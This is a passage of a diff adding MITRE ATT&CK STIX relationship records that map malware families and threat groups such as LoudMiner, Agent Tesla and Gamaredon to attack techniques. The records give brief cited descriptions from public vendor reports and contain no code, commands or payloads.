+ "relationship_type": "uses",
+ "id": "relationship--8f43b5c3-883a-40b7-b9b2-a96ba8c7001b",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.292Z",
+ "created": "2020-05-18T21:01:51.172Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) can automatically launch at startup if the AutoStart option is enabled in the VBoxVmService configuration file.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8e8a2a1c-3574-417c-95be-d62bb9d8f40a",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.276Z",
+ "created": "2020-05-18T21:01:51.180Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) used a batch script to run the Linux virtual machine as a service.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--e42b5898-2a13-4266-941c-8ef8b8090c8d",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.290Z",
+ "created": "2020-05-18T21:01:51.181Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) started the cryptomining virtual machine as a service on the infected machine.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--94824fdd-25fa-4d23-9220-825f04c4bcc6",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.273Z",
+ "created": "2020-05-18T21:01:51.192Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) has set the attributes of the VirtualBox directory and VBoxVmService parent directory to \"hidden\".(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--533d9f70-6f01-4eed-a198-bf0d29586897",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.280Z",
+ "created": "2020-05-18T21:01:51.343Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) has monitored CPU usage.(Citation: ESET LoudMiner June 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--9e339696-4e81-496f-808e-82d63b62c331",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.287Z",
+ "created": "2020-05-18T21:01:51.346Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) launched the QEMU services in the /Library/LaunchDaemons/ folder using launchctl.(Citation: ESET LoudMiner June 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--131d75f1-84c3-4ef8-b858-7f74aa7ce157",
+ "type": "relationship",
+ "modified": "2020-06-29T23:11:50.937Z",
+ "created": "2020-05-18T21:01:51.371Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) has obfuscated various scripts and encrypted DMG files.(Citation: ESET LoudMiner June 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--2f96597c-70d9-41ba-b019-fb7510d3d732",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.379Z",
+ "created": "2020-05-18T21:01:51.367Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) harvested system resources to mine cryptocurrency, using XMRig to mine Monero.(Citation: ESET LoudMiner June 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--774302ff-3ab9-4328-a434-6188efe0928a",
+ "type": "relationship",
+ "modified": "2020-06-29T23:06:26.175Z",
+ "created": "2020-05-18T21:01:51.374Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) deleted installation files after completion.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--958b9dfc-1c5b-490c-86c5-137e0def493e",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.371Z",
+ "created": "2020-05-18T21:01:51.376Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) used shell scripts to launch various services and to start/stop the QEMU virtualization.(Citation: ESET LoudMiner June 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--55aa08a3-d33a-465b-8d48-d25566ce0957",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.376Z",
+ "created": "2020-05-18T21:01:51.379Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) added plist files in /Library/LaunchDaemons with RunAtLoad set to true.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7398839c-3feb-4162-a3d2-dda8fc2f0375",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.427Z",
+ "created": "2020-05-18T21:01:51.369Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) used the ps command to monitor the running processes on the system.(Citation: ESET LoudMiner June 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--1232c797-ebf4-4036-9ebb-a65fbe8b1443",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.527Z",
+ "created": "2020-05-18T21:01:51.381Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0",
+ "external_references": [
+ {
+ "source_name": "FireEye Ryuk and Trickbot January 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used AdFind.exe to collect information about Active Directory organizational units and trust objects.(Citation: FireEye Ryuk and Trickbot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--e2df3e8d-beeb-4592-88f0-0241e321be91",
+ "type": "relationship",
+ "modified": "2020-05-18T21:36:26.102Z",
+ "created": "2020-05-18T21:36:26.102Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
+ "external_references": [
+ {
+ "source_name": "Infoblox Lokibot January 2019",
+ "url": "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22",
+ "description": "Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has used several packing methods for obfuscation.(Citation: Infoblox Lokibot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--0c5577aa-30c5-47f5-83f3-34260860e2b6",
+ "type": "relationship",
+ "modified": "2020-05-18T22:00:40.664Z",
+ "created": "2020-05-18T22:00:40.664Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
+ "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Agent Tesla April 2020",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
+ "description": "Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020."
+ }
+ ],
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to steal credentials from FTP clients and wireless profiles.(Citation: Malwarebytes Agent Tesla April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ae151f0a-374b-47c0-a4e6-b9bdc7ee55b5",
+ "type": "relationship",
+ "modified": "2020-05-20T19:41:37.828Z",
+ "created": "2020-05-19T17:32:26.395Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
+ "target_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Agent Tesla April 2020",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
+ "description": "Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020."
+ }
+ ],
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has used ProcessWindowStyle.Hidden to hide windows.(Citation: Malwarebytes Agent Tesla April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--75bd34c6-c8b3-4b5e-aac4-9e410515169c",
+ "type": "relationship",
+ "modified": "2020-05-19T17:32:26.398Z",
+ "created": "2020-05-19T17:32:26.398Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Agent Tesla April 2020",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
+ "description": "Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020."
+ }
+ ],
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to decrypt strings encrypted with the Rijndael symmetric encryption algorithm.(Citation: Malwarebytes Agent Tesla April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--a4105315-b63d-47c9-9526-3dd388d892b4",
+ "type": "relationship",
+ "modified": "2020-05-20T13:38:07.120Z",
+ "created": "2020-05-19T17:32:26.401Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
+ "target_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Agent Tesla April 2020",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
+ "description": "Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020."
+ }
+ ],
+ "description": " [Agent Tesla](https://attack.mitre.org/software/S0331) has he ability to perform anti-sandboxing and anti-virtualization checks.(Citation: Malwarebytes Agent Tesla April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--061f0d25-40fd-440a-b7e8-54ad0209f5f4",
+ "type": "relationship",
+ "modified": "2020-05-19T17:32:26.402Z",
+ "created": "2020-05-19T17:32:26.402Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
+ "target_ref": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47",
+ "external_references": [
+ {
+ "source_name": "Bitdefender Agent Tesla April 2020",
+ "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/",
+ "description": "Arsene, L. (2020, April 21). Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020."
+ }
+ ],
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to use form-grabbing to extract data from web data forms.(Citation: Bitdefender Agent Tesla April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--5bbbd951-0c4a-4293-b0a8-27751b953882",
+ "type": "relationship",
+ "modified": "2020-05-20T14:05:11.768Z",
+ "created": "2020-05-19T17:32:26.437Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Bitdefender Agent Tesla April 2020",
+ "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/",
+ "description": "Arsene, L. (2020, April 21). Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020."
+ }
+ ],
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has been executed through malicious e-mail attachments (Citation: Bitdefender Agent Tesla April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1cd41777-3d65-4e39-8de7-3951d1568c16",
+ "type": "relationship",
+ "modified": "2020-05-20T13:38:07.117Z",
+ "created": "2020-05-19T17:32:26.498Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools can delete files used during an infection.(Citation: TrendMicro Gamaredon April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--bda5489b-7735-4793-8816-fc2238f6957f",
+ "type": "relationship",
+ "modified": "2020-06-22T17:55:32.117Z",
+ "created": "2020-05-19T20:39:12.429Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools have registered Run keys in the registry to give malicious VBS files persistence.(Citation: TrendMicro Gamaredon April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f2d0fd0d-7bfc-4f3e-bd78-2d691c476046",
+ "type": "relationship",
+ "modified": "2020-06-22T18:23:55.083Z",
+ "created": "2020-05-19T20:39:12.450Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools decrypted additional payloads from the C2.(Citation: TrendMicro Gamaredon April 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--86bcc5c3-456e-4bac-a419-54f54af80325",
+ "type": "relationship",
+ "modified": "2020-06-22T17:55:32.153Z",
+ "created": "2020-05-19T20:39:12.455Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has embedded malicious macros in document templates, which executed VBScript. [Gamaredon Group](https://attack.mitre.org/groups/G0047) has also delivered Microsoft Outlook VBA projects with embedded macros.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3a6022ea-7647-4d61-8103-dd354d8dfd4d",
+ "type": "relationship",
+ "modified": "2020-06-22T18:23:55.089Z",
+ "created": "2020-05-19T20:39:12.457Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used DOCX files to download malicious DOT document templates. [Gamaredon Group](https://attack.mitre.org/groups/G0047) can also inject malicious macros or remote templates into documents already present on compromised systems.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7cabf1a6-5ad3-4c5d-83e8-161d49e082ac",
+ "type": "relationship",
+ "modified": "2020-06-22T17:55:32.125Z",
+ "created": "2020-05-19T20:39:12.459Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has attempted to get users to click on Office attachments with malicious macros embedded.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e84791af-7bdb-4fe9-8e03-7a10a154c9a4",
+ "type": "relationship",
+ "modified": "2020-06-22T18:13:02.157Z",
+ "created": "2020-05-19T20:39:12.495Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
